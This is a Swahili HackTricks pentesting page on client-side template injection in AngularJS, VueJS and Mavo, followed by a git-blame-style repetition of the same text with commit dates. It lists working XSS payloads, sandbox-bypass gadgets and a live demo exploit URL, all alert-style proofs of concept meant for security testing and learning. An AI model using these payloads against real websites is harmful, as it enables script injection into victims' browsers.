hacktricks/pentesting-web/client-side-template-injection-csti.md

<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>


# Muhtasari

Ni kama [**Uvujaji wa Kiolesura cha Upande wa Seva**](ssti-server-side-template-injection/) lakini kwenye **mteja**. **SSTI** inaweza kuruhusu wewe **kutekeleza nambari** kwenye seva ya mbali, **CSTI** inaweza kuruhusu wewe **kutekeleza nambari ya JavaScript** isiyo na kikomo kwenye kivinjari cha muathiriwa.

**Kujaribu** kwa udhaifu huu ni sawa na katika kesi ya **SSTI**, mkalimani anatarajia **kiolesura** na kuitekeleza. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni **dhaifu** utaona `0`, na kama sivyo, utaona asili: `{{ 7-7 }}`

# AngularJS

AngularJS ni mfumo maarufu wa JavaScript unaoshirikiana na HTML kupitia sifa inayoitwa miongozo, moja inayojulikana ni **`ng-app`**. Miongozo hii inaruhusu AngularJS kusindika yaliyomo ya HTML, ikiruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.

Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulioandikwa na `ng-app`, inawezekana kutekeleza nambari isiyo na kikomo ya JavaScript. Hii inaweza kufanikishwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi nambari ya JavaScript inavyoweza kutekelezwa:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
Unaweza kupata mfano wa msingi sana wa udhaifu katika **AngularJS** katika [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) na katika **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**

{% hint style="danger" %}
[**Angular 1.6 iliondoa sanduku la mchanga**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) hivyo kutoka kwenye toleo hili, mzigo kama `{{constructor.constructor('alert(1)')()}}` au `<input ng-focus=$event.view.alert('XSS')>` inapaswa kufanya kazi.
{% endhint %}

# VueJS

Unaweza kupata utekelezaji wa **Vue ulio na udhaifu** katika [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Mzigo unaofanya kazi: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)

Na **msimbo wa chanzo** wa mfano ulio na udhaifu unapatikana hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
## **V3**  

Machapisho mazuri sana kuhusu CSTI katika VUE yanaweza kupatikana katika [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
```
{{_openBlock.constructor('alert(1)')()}}
```
Mikopo: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

## **V2**
```
{{constructor.constructor('alert(1)')()}}
```
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)

**Angalia mizigo zaidi ya VUE katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)

# Mavo

Payload:
```
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**Payloads zaidi katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)

# **Orodha ya Uchunguzi wa Kuvunja-Nguvu**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}


<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


Translated to Swahili 2024-02-11 02:13:58 +00:00			`# Muhtasari`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Ni kama [Uvujaji wa Kiolesura cha Upande wa Seva](ssti-server-side-template-injection/) lakini kwenye mteja. SSTI inaweza kuruhusu wewe kutekeleza nambari kwenye seva ya mbali, CSTI inaweza kuruhusu wewe kutekeleza nambari ya JavaScript isiyo na kikomo kwenye kivinjari cha muathiriwa.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			Kujaribu kwa udhaifu huu ni sawa na katika kesi ya SSTI, mkalimani anatarajia kiolesura na kuitekeleza. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni dhaifu utaona `0`, na kama sivyo, utaona asili: `{{ 7-7 }}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2022-05-01 13:41:36 +01:00			`# AngularJS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			AngularJS ni mfumo maarufu wa JavaScript unaoshirikiana na HTML kupitia sifa inayoitwa miongozo, moja inayojulikana ni `ng-app`. Miongozo hii inaruhusu AngularJS kusindika yaliyomo ya HTML, ikiruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulioandikwa na `ng-app`, inawezekana kutekeleza nambari isiyo na kikomo ya JavaScript. Hii inaweza kufanikishwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi nambari ya JavaScript inavyoweza kutekelezwa:
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```javascript
			`{{$on.constructor('alert(1)')()}}`
			`{{constructor.constructor('alert(1)')()}}`
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`<input ng-focus=$event.view.alert('XSS')>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`<!-- Google Research - AngularJS -->`
			`<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>`
			```
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Unaweza kupata mfano wa msingi sana wa udhaifu katika AngularJS katika [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) na katika [Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`{% hint style="danger" %}`
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			[Angular 1.6 iliondoa sanduku la mchanga](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) hivyo kutoka kwenye toleo hili, mzigo kama `{{constructor.constructor('alert(1)')()}}` au `<input ng-focus=$event.view.alert('XSS')>` inapaswa kufanya kazi.
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`{% endhint %}`

fix mess 2022-05-01 13:41:36 +01:00			`# VueJS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Unaweza kupata utekelezaji wa Vue ulio na udhaifu katika [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\`
Translated to Swahili 2024-02-11 02:13:58 +00:00			Mzigo unaofanya kazi: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Na msimbo wa chanzo wa mfano ulio na udhaifu unapatikana hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```markup
			`<!-- Google Research - Vue.js-->`
			"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
			```
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`## V3`
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Machapisho mazuri sana kuhusu CSTI katika VUE yanaweza kupatikana katika [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`{{_openBlock.constructor('alert(1)')()}}`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Mikopo: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00
fix mess 2022-05-01 13:41:36 +01:00			`## V2`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`{{constructor.constructor('alert(1)')()}}`
			```
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Credit: [Mario Heiderich](https://twitter.com/cure53berlin)`

			`Angalia mizigo zaidi ya VUE katika [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`# Mavo`

			`Payload:`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2021-06-25 16:39:43 +00:00			`[7*7]`
			`[(1,alert)(1)]`
			`<div mv-expressions="{{ }}">{{top.alert(1)}}</div>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`[self.alert(1)]`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`javascript:alert(1)%252f%252f..%252fcss-images`
			`[Omglol mod 1 mod self.alert (1) andlol]`
GitBook: [master] 3 pages modified 2021-06-25 16:39:43 +00:00			`[''=''or self.alert(lol)]`
			`<a data-mv-if='1 or self.alert(1)'>test</a>`
			`<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>`
			`<a href=[javascript&':alert(1)']>test</a>`
			`[self.alert(1)mod1]`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`Payloads zaidi katika [https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`# Orodha ya Uchunguzi wa Kuvunja-Nguvu`
GitBook: [master] 10 pages modified 2021-06-27 21:56:13 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/captcha-bypass.md', 'pentesting-web/client-s 2024-03-10 13:32:05 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`